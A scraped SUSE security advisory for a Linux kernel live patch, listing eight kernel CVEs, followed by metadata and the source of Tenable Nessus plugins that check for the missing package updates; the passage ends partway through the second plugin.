Security update for Linux Kernel Live Patch 2 for SLE 12 SP1 (important)
2016-08-09T17:31:09
ID SUSE-SU-2016:2009-1 Type suse Reporter Suse Modified 2016-08-09T17:31:09
Description
This update for the Linux Kernel 3.12.51-60_25 fixes the several issues.
These security issues were fixed:
- CVE-2016-4470: The key_reject_and_link function in security/keys/key.c
in the Linux kernel did not ensure that a certain data structure is
initialized, which allowed local users to cause a denial of service
(system crash) via vectors involving a crafted keyctl request2 command
(bsc#984764).
- CVE-2016-1583: The ecryptfs_privileged_open function in
fs/ecryptfs/kthread.c in the Linux kernel allowed local users to gain
privileges or cause a denial of service (stack memory consumption) via
vectors involving crafted mmap calls for /proc pathnames, leading to
recursive pagefault handling (bsc#983144).
- CVE-2016-4565: The InfiniBand (aka IB) stack in the Linux kernel
incorrectly relied on the write system call, which allowed local users
to cause a denial of service (kernel memory write operation) or possibly
have unspecified other impact via a uAPI interface (bsc#980883).
- CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in the Linux
kernel allowed local users to gain privileges via crafted ASN.1 data
(bsc#980856).
- CVE-2015-8019: The skb_copy_and_csum_datagram_iovec function in
net/core/datagram.c in the Linux kernel did not accept a length
argument, which allowed local users to cause a denial of service (memory
corruption) or possibly have unspecified other impact via a write system
call followed by a recvmsg system call (bsc#979078).
- CVE-2016-2053: The asn1_ber_decoder function in lib/asn1_decoder.c in
the Linux kernel allowed attackers to cause a denial of service (panic)
via an ASN.1 BER file that lacks a public key, leading to mishandling by
the public_key_verify_signature function in
crypto/asymmetric_keys/public_key.c (bsc#979074).
- CVE-2015-8816: The hub_activate function in drivers/usb/core/hub.c in
the Linux kernel did not properly maintain a hub-interface data
structure, which allowed physically proximate attackers to cause a
denial of service (invalid memory access and system crash) or possibly
have unspecified other impact by unplugging a USB hub device
(bsc#979064).
- CVE-2016-3134: The netfilter subsystem in the Linux kernel did not
validate certain offset fields, which allowed local users to gain
privileges or cause a denial of service (heap memory corruption) via an
IPT_SO_SET_REPLACE setsockopt call (bsc#971793).
This non-security issue was fixed:
- bsc#973570: The fix for CVE-2013-7446 introduced a bug that could have
possibly lead to a softlockup.
{"enchantments": {"score": {"value": 8.5, "vector": "NONE", "modified": "2016-09-04T12:10:59", "rev": 2}, "dependencies": {"references": [{"type": "nessus", "idList": ["SUSE_SU-2016-2005-1.NASL", "SUSE_SU-2016-2002-1.NASL", "SUSE_SU-2016-2001-1.NASL", "SUSE_SU-2016-2010-1.NASL", "REDHAT-RHSA-2016-1657.NASL", "EULEROS_SA-2016-1043.NASL", "OPENSUSE-2016-753.NASL", "SUSE_SU-2016-2014-1.NASL", "SUSE_SU-2016-1995-1.NASL", "SUSE_SU-2016-2006-1.NASL"]}, {"type": "suse", "idList": ["SUSE-SU-2016:2007-1", "SUSE-SU-2016:2010-1", "SUSE-SU-2016:2014-1", "SUSE-SU-2016:2002-1", "SUSE-SU-2016:1995-1", "SUSE-SU-2016:1961-1", "SUSE-SU-2016:1994-1", "SUSE-SU-2016:2001-1", "SUSE-SU-2016:2005-1", "SUSE-SU-2016:2006-1"]}, {"type": "cve", "idList": ["CVE-2016-1583", "CVE-2015-8816", "CVE-2016-2053", "CVE-2016-3134", "CVE-2016-4565", "CVE-2015-8019", "CVE-2016-4470", "CVE-2016-0758", "CVE-2013-7446"]}, {"type": "android", "idList": ["ANDROID:CVE-2016-4470", "ANDROID:CVE-2015-8816", "ANDROID:CVE-2013-7446", "ANDROID:CVE-2016-0758", "ANDROID:CVE-2016-3134"]}, {"type": "f5", "idList": ["SOL02254805", "F5:K10515241", "SOL20022580", "SOL55672042", "F5:K20022580", "F5:K02254805", "F5:K55672042"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310808522", "OPENVAS:1361412562310808914", "OPENVAS:1361412562310842854", "OPENVAS:1361412562311220161043", "OPENVAS:1361412562310851349", "OPENVAS:1361412562310842850", "OPENVAS:1361412562310842798", "OPENVAS:1361412562310808556", "OPENVAS:1361412562310851388", "OPENVAS:1361412562310842789"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-1277", "ELSA-2016-3636", "ELSA-2016-1539", "ELSA-2016-3635"]}, {"type": "redhat", "idList": ["RHSA-2017:2760", "RHSA-2016:1657"]}, {"type": "ubuntu", "idList": ["USN-3008-1", "USN-2999-1", "USN-3050-1", "USN-3049-1"]}, {"type": "fedora", "idList": ["FEDORA:4F34C605E513", "FEDORA:EE2EE6087A58", "FEDORA:F325C6013F0A"]}, {"type": "exploitdb", "idList": ["EDB-ID:39992"]}, {"type": "zdt", "idList": ["1337DAY-ID-25603"]}], "modified": "2016-09-04T12:10:59", "rev": 2}, "vulnersScore": 8.5}, "reporter": "Suse", "id": "SUSE-SU-2016:2009-1", "modified": "2016-08-09T17:31:09", "published": "2016-08-09T17:31:09", "bulletinFamily": "unix", "viewCount": 2, "cvelist": ["CVE-2016-2053", "CVE-2016-1583", "CVE-2016-0758", "CVE-2015-8019", "CVE-2015-8816", "CVE-2013-7446", "CVE-2016-4470", "CVE-2016-4565", "CVE-2016-3134"], "affectedPackage": [{"packageVersion": "2.1", "packageName": "kgraft-patch-3_12_51-60_25-xen-4", "packageFilename": "kgraft-patch-3_12_51-60_25-xen-4-2.1.x86_64.rpm", "operator": "lt", "OSVersion": "12", "OS": "SUSE Linux Enterprise Live Patching", "arch": "x86_64"}, {"packageVersion": "2.1", "packageName": "kgraft-patch-3_12_51-60_25-default-4", "packageFilename": "kgraft-patch-3_12_51-60_25-default-4-2.1.x86_64.rpm", "operator": "lt", "OSVersion": "12", "OS": "SUSE Linux Enterprise Live Patching", "arch": "x86_64"}], "type": "suse", "references": ["https://bugzilla.suse.com/973570", "https://bugzilla.suse.com/980856", "https://bugzilla.suse.com/971793", "https://bugzilla.suse.com/984764", "https://bugzilla.suse.com/979064", "https://bugzilla.suse.com/980883", "https://bugzilla.suse.com/979078", "https://bugzilla.suse.com/979074", "https://bugzilla.suse.com/983144"], "description": "This update for the Linux Kernel 3.12.51-60_25 fixes the several issues.\n\n These security issues were fixed:\n - CVE-2016-4470: The key_reject_and_link function in security/keys/key.c\n in the Linux kernel did not ensure that a certain data structure is\n initialized, which allowed local users to cause a denial of service\n (system crash) via vectors involving a crafted keyctl request2 command\n (bsc#984764).\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (stack memory consumption) via\n vectors involving crafted mmap calls for /proc pathnames, leading to\n recursive pagefault handling (bsc#983144).\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the Linux kernel\n incorrectly relied on the write system call, which allowed local users\n to cause a denial of service (kernel memory write operation) or possibly\n have unspecified other impact via a uAPI interface (bsc#980883).\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in the Linux\n kernel allowed local users to gain privileges via crafted ASN.1 data\n (bsc#980856).\n - CVE-2015-8019: The skb_copy_and_csum_datagram_iovec function in\n net/core/datagram.c in the Linux kernel did not accept a length\n argument, which allowed local users to cause a denial of service (memory\n corruption) or possibly have unspecified other impact via a write system\n call followed by a recvmsg system call (bsc#979078).\n - CVE-2016-2053: The asn1_ber_decoder function in lib/asn1_decoder.c in\n the Linux kernel allowed attackers to cause a denial of service (panic)\n via an ASN.1 BER file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n - CVE-2015-8816: The hub_activate function in drivers/usb/core/hub.c in\n the Linux kernel did not properly maintain a hub-interface data\n structure, which allowed physically proximate attackers to cause a\n denial of service (invalid memory access and system crash) or possibly\n have unspecified other impact by unplugging a USB hub device\n (bsc#979064).\n - CVE-2016-3134: The netfilter subsystem in the Linux kernel did not\n validate certain offset fields, which allowed local users to gain\n privileges or cause a denial of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n\n This non-security issue was fixed:\n - bsc#973570: The fix for CVE-2013-7446 introduced a bug that could have\n possibly lead to a softlockup.\n\n", "title": "Security update for Linux Kernel Live Patch 2 for SLE 12 SP1 (important)", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00021.html", "lastseen": "2016-09-04T12:10:59", "edition": 1, "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}
{"nessus": [{"lastseen": "2021-01-07T14:24:25", "description": "This update for the Linux Kernel 3.12.51-52_31 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2016-4470: The key_reject_and_link function in\n security/keys/key.c in the Linux kernel did not ensure\n that a certain data structure is initialized, which\n allowed local users to cause a denial of service (system\n crash) via vectors involving a crafted keyctl request2\n command (bsc#984764).\n\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (stack memory consumption) via vectors involving crafted\n mmap calls for /proc pathnames, leading to recursive\n pagefault handling (bsc#983144).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the\n Linux kernel incorrectly relied on the write system\n call, which allowed local users to cause a denial of\n service (kernel memory write operation) or possibly have\n unspecified other impact via a uAPI interface\n (bsc#980883).\n\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in\n the Linux kernel allowed local users to gain privileges\n via crafted ASN.1 data (bsc#980856).\n\n - CVE-2015-8019: The skb_copy_and_csum_datagram_iovec\n function in net/core/datagram.c in the Linux kernel did\n not accept a length argument, which allowed local users\n to cause a denial of service (memory corruption) or\n possibly have unspecified other impact via a write\n system call followed by a recvmsg system call\n (bsc#979078).\n\n - CVE-2016-2053: The asn1_ber_decoder function in\n lib/asn1_decoder.c in the Linux kernel allowed attackers\n to cause a denial of service (panic) via an ASN.1 BER\n file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n\n - CVE-2015-8816: The hub_activate function in\n drivers/usb/core/hub.c in the Linux kernel did not\n properly maintain a hub-interface data structure, which\n allowed physically proximate attackers to cause a denial\n of service (invalid memory access and system crash) or\n possibly have unspecified other impact by unplugging a\n USB hub device (bsc#979064).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux\n kernel did not validate certain offset fields, which\n allowed local users to gain privileges or cause a denial\n of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n\n - CVE-2013-7446: Use-after-free vulnerability in\n net/unix/af_unix.c in the Linux kernel allowed local\n users to bypass intended AF_UNIX socket permissions or\n cause a denial of service (panic) via crafted epoll_ctl\n calls (bsc#973570, bsc#955837).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-02T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2016:1995-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2053", "CVE-2016-1583", "CVE-2016-0758", "CVE-2015-8019", "CVE-2015-8816", "CVE-2013-7446", "CVE-2016-4470", "CVE-2016-4565", "CVE-2016-3134"], "modified": "2016-09-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_51-52_31-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_51-52_31-xen"], "id": "SUSE_SU-2016-1995-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93270", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:1995-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93270);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-7446\", \"CVE-2015-8019\", \"CVE-2015-8816\", \"CVE-2016-0758\", \"CVE-2016-1583\", \"CVE-2016-2053\", \"CVE-2016-3134\", \"CVE-2016-4470\", \"CVE-2016-4565\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2016:1995-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.51-52_31 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2016-4470: The key_reject_and_link function in\n security/keys/key.c in the Linux kernel did not ensure\n that a certain data structure is initialized, which\n allowed local users to cause a denial of service (system\n crash) via vectors involving a crafted keyctl request2\n command (bsc#984764).\n\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (stack memory consumption) via vectors involving crafted\n mmap calls for /proc pathnames, leading to recursive\n pagefault handling (bsc#983144).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the\n Linux kernel incorrectly relied on the write system\n call, which allowed local users to cause a denial of\n service (kernel memory write operation) or possibly have\n unspecified other impact via a uAPI interface\n (bsc#980883).\n\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in\n the Linux kernel allowed local users to gain privileges\n via crafted ASN.1 data (bsc#980856).\n\n - CVE-2015-8019: The skb_copy_and_csum_datagram_iovec\n function in net/core/datagram.c in the Linux kernel did\n not accept a length argument, which allowed local users\n to cause a denial of service (memory corruption) or\n possibly have unspecified other impact via a write\n system call followed by a recvmsg system call\n (bsc#979078).\n\n - CVE-2016-2053: The asn1_ber_decoder function in\n lib/asn1_decoder.c in the Linux kernel allowed attackers\n to cause a denial of service (panic) via an ASN.1 BER\n file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n\n - CVE-2015-8816: The hub_activate function in\n drivers/usb/core/hub.c in the Linux kernel did not\n properly maintain a hub-interface data structure, which\n allowed physically proximate attackers to cause a denial\n of service (invalid memory access and system crash) or\n possibly have unspecified other impact by unplugging a\n USB hub device (bsc#979064).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux\n kernel did not validate certain offset fields, which\n allowed local users to gain privileges or cause a denial\n of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n\n - CVE-2013-7446: Use-after-free vulnerability in\n net/unix/af_unix.c in the Linux kernel allowed local\n users to bypass intended AF_UNIX socket permissions or\n cause a denial of service (panic) via crafted epoll_ctl\n calls (bsc#973570, bsc#955837).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=955837\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971793\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973570\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979074\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979078\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980856\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980883\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=983144\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=984764\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-7446/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8019/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8816/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-0758/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-1583/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2053/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3134/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4470/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4565/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20161995-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e7ed9d8e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2016-1175=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2016-1175=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_51-52_31-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_51-52_31-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_51-52_31-default-5-2.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_51-52_31-xen-5-2.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:24:29", "description": "This update for the Linux Kernel 3.12.48-52_27 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2016-4470: The key_reject_and_link function in\n security/keys/key.c in the Linux kernel did not ensure\n that a certain data structure is initialized, which\n allowed local users to cause a denial of service (system\n crash) via vectors involving a crafted keyctl request2\n command (bsc#984764).\n\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (stack memory consumption) via vectors involving crafted\n mmap calls for /proc pathnames, leading to recursive\n pagefault handling (bsc#983144).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the\n Linux kernel incorrectly relied on the write system\n call, which allowed local users to cause a denial of\n service (kernel memory write operation) or possibly have\n unspecified other impact via a uAPI interface\n (bsc#980883).\n\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in\n the Linux kernel allowed local users to gain privileges\n via crafted ASN.1 data (bsc#980856).\n\n - CVE-2015-8019: The skb_copy_and_csum_datagram_iovec\n function in net/core/datagram.c in the Linux kernel did\n not accept a length argument, which allowed local users\n to cause a denial of service (memory corruption) or\n possibly have unspecified other impact via a write\n system call followed by a recvmsg system call\n (bsc#979078).\n\n - CVE-2016-2053: The asn1_ber_decoder function in\n lib/asn1_decoder.c in the Linux kernel allowed attackers\n to cause a denial of service (panic) via an ASN.1 BER\n file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n\n - CVE-2015-8816: The hub_activate function in\n drivers/usb/core/hub.c in the Linux kernel did not\n properly maintain a hub-interface data structure, which\n allowed physically proximate attackers to cause a denial\n of service (invalid memory access and system crash) or\n possibly have unspecified other impact by unplugging a\n USB hub device (bsc#979064).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux\n kernel did not validate certain offset fields, which\n allowed local users to gain privileges or cause a denial\n of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n\n - CVE-2013-7446: Use-after-free vulnerability in\n net/unix/af_unix.c in the Linux kernel allowed local\n users to bypass intended AF_UNIX socket permissions or\n cause a denial of service (panic) via crafted epoll_ctl\n calls (bsc#973570, bsc#955837).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-02T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2016:2005-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2053", "CVE-2016-1583", "CVE-2016-0758", "CVE-2015-8019", "CVE-2015-8816", "CVE-2013-7446", "CVE-2016-4470", "CVE-2016-4565", "CVE-2016-3134"], "modified": "2016-09-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_48-52_27-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_48-52_27-xen"], "id": "SUSE_SU-2016-2005-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93277", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2005-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93277);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-7446\", \"CVE-2015-8019\", \"CVE-2015-8816\", \"CVE-2016-0758\", \"CVE-2016-1583\", \"CVE-2016-2053\", \"CVE-2016-3134\", \"CVE-2016-4470\", \"CVE-2016-4565\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2016:2005-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.48-52_27 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2016-4470: The key_reject_and_link function in\n security/keys/key.c in the Linux kernel did not ensure\n that a certain data structure is initialized, which\n allowed local users to cause a denial of service (system\n crash) via vectors involving a crafted keyctl request2\n command (bsc#984764).\n\n - CVE-2016-1583: The ecryptfs_privileged_open function in\n fs/ecryptfs/kthread.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (stack memory consumption) via vectors involving crafted\n mmap calls for /proc pathnames, leading to recursive\n pagefault handling (bsc#983144).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the\n Linux kernel incorrectly relied on the write system\n call, which allowed local users to cause a denial of\n service (kernel memory write operation) or possibly have\n unspecified other impact via a uAPI interface\n (bsc#980883).\n\n - CVE-2016-0758: Integer overflow in lib/asn1_decoder.c in\n the Linux kernel allowed local users to gain privileges\n via crafted ASN.1 data (bsc#980856).\n\n - CVE-2015-8019: The skb_copy_and_csum_datagram_iovec\n function in net/core/datagram.c in the Linux kernel did\n not accept a length argument, which allowed local users\n to cause a denial of service (memory corruption) or\n possibly have unspecified other impact via a write\n system call followed by a recvmsg system call\n (bsc#979078).\n\n - CVE-2016-2053: The asn1_ber_decoder function in\n lib/asn1_decoder.c in the Linux kernel allowed attackers\n to cause a denial of service (panic) via an ASN.1 BER\n file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bsc#979074).\n\n - CVE-2015-8816: The hub_activate function in\n drivers/usb/core/hub.c in the Linux kernel did not\n properly maintain a hub-interface data structure, which\n allowed physically proximate attackers to cause a denial\n of service (invalid memory access and system crash) or\n possibly have unspecified other impact by unplugging a\n USB hub device (bsc#979064).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux\n kernel did not validate certain offset fields, which\n allowed local users to gain privileges or cause a denial\n of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bsc#971793).\n\n - CVE-2013-7446: Use-after-free vulnerability in\n net/unix/af_unix.c in the Linux kernel allowed local\n users to bypass intended AF_UNIX socket permissions or\n cause a denial of service (panic) via crafted epoll_ctl\n calls (bsc#973570, bsc#955837).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=955837\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971793\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973570\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979074\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979078\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980856\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980883\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=983144\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=984764\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 